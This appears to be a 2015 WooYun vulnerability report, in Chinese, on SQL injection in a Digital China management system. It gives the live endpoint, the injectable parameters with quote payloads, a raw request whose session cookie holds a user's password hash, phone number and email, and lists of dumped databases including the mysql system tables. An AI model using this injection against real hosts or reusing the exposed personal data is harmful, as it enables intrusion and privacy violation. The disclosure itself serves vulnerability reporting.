当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148308

漏洞标题:神州数码某管理系统SQL注射(root权限)

相关厂商:digitalchina.com

漏洞作者: Focusstart

提交时间:2015-10-21 12:12

修复时间:2015-12-05 16:30

公开时间:2015-12-05 16:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-21: 厂商已经确认,细节仅向厂商公开
2015-10-31: 细节向核心白帽子及相关领域专家公开
2015-11-10: 细节向普通白帽子公开
2015-11-20: 细节向实习白帽子公开
2015-12-05: 细节向公众公开

简要描述:

神州数码某管理系统SQL注射(root权限)
专业捡漏100年

详细说明:

在首页看到公开的漏洞

00.png


于是注册了个账号进行测试
搜索处存在SQL注射

0.png

漏洞证明:

单引号直接报错

1.png


POST /index.php/zebra/clist HTTP/1.1
Host: dckf.digitalchina.com
Proxy-Connection: keep-alive
Content-Length: 57
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://dckf.digitalchina.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://dckf.digitalchina.com/index.php/point/main
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ci_session=a%3A26%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22dc677916780140e655164067defe9748%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%2258.20.51.228%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A108%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F31.0.1650.63+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1445398019%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A3%3A%22891%22%3Bs%3A8%3A%22username%22%3Bs%3A10%3A%22helloworld%22%3Bs%3A8%3A%22realname%22%3Bs%3A6%3A%22%E8%8A%B1%E7%BA%B9%22%3Bs%3A8%3A%22password%22%3Bs%3A16%3A%22a7830e88a5e70fd6%22%3Bs%3A8%3A%22authcode%22%3Bs%3A32%3A%22a448949445b9a2f3d60265cb38456a53%22%3Bs%3A7%3A%22company%22%3Bs%3A18%3A%22%E6%B5%8B%E8%AF%95%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8%22%3Bs%3A4%3A%22sign%22%3Bs%3A6%3A%22%E6%B5%8B%E8%AF%95%22%3Bs%3A7%3A%22address%22%3Bs%3A11%3A%22%E6%B5%8B%E8%AF%9511122%22%3Bs%3A4%3A%22area%22%3BN%3Bs%3A2%3A%22pc%22%3Bs%3A0%3A%22%22%3Bs%3A3%3A%22tel%22%3Bs%3A11%3A%2213574041235%22%3Bs%3A3%3A%22fax%22%3Bs%3A12%3A%22073188811111%22%3Bs%3A5%3A%22email%22%3Bs%3A21%3A%22guo_shao_ming%40126.com%22%3Bs%3A6%3A%22regday%22%3Bs%3A19%3A%222015-10-21+11%3A17%3A53%22%3Bs%3A5%3A%22pplan%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22ppoint%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22paduit%22%3BN%3Bs%3A8%3A%22pcorrect%22%3BN%3Bs%3A6%3A%22pquery%22%3BN%3Bs%3A6%3A%22padmin%22%3BN%3Bs%3A4%3A%22demo%22%3BN%3B%7De9fa90726b499d543d748af72de4851e
sdate=2015-10-01&edate=2015-10-01&rma=a%27&sn=a%27&state=


参数rma和sn都存在注入

2.png


Database: p_points
[17 tables]
+---------------------------------------+
| ci_sessions |
| p_contact |
| p_holidays |
| p_image |
| p_info |
| p_log |
| p_moto |
| p_olddata |
| p_printer |
| p_qa |
| p_qacc |
| p_qasetup |
| p_rfile |
| p_smtp |
| p_sysinfo |
| p_url |
| p_user |
+---------------------------------------+
Database: p_orders
[28 tables]
+---------------------------------------+
| ci_sessions |
| m_backlog |
| m_gongshi |
| m_icrlist |
| m_kclist |
| m_kucun |
| m_order |
| m_orderlist |
| m_pclist |
| m_pe |
| m_pelist |
| m_product |
| m_purchase |
| m_team |
| p_factory |
| p_info |
| p_log |
| p_smtp |
| p_sysinfo |
| p_user |
| z_icrlist |
| z_kucun |
| z_order |
| z_pclist |
| z_pe |
| z_pelist |
| z_product |
| z_purchase |
+---------------------------------------+
Database: dcmobile
[3 tables]
+---------------------------------------+
| dc2 |
| dc_order |
| item_cfg |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 Focusstart@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-21 16:28

厂商回复:

尽快处理,谢谢

最新状态:

暂无


漏洞评价:

评价